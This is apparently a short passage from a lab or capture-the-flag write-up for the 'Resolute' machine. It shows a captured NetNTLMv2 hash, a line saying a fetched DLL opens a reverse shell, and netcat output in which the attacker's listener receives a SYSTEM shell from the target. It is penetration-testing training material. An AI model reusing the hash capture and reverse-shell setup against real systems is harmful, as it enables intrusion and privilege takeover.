[*] RESOLUTE$::MEGABANK:aaaaaaaaaaaaaaaa:c4cf63c48f5e74889f9771b7e0e747f1:010100000000000000d5ad10b02adb019ab1416c88401bcb00000000010010004c004100720078007300490077006300030010004c00410072007800730049007700630002001000650076005300670072006a005400550004001000650076005300670072006a00540055000700080000d5ad10b02adb0106000400020000000800300030000000000000000000000000400000f6a498ccbba2aaa00cd38aa8e271e8ea695faac0038a4ca3c3730c2b4795de0f0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00320031000000000000000000
 

 

The fetched DLL then runs and attempts the reverse shell connection, and a SYSTEM shell is obtained on the waiting port.

┌──(root㉿kali)-[~/Pentest/Machine]
└─# nc -lvnp 4444                                                                                                                                            
listening on [any] 4444 ...
connect to [10.10.14.21] from (UNKNOWN) [10.10.10.169] 57922
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
 

 

 
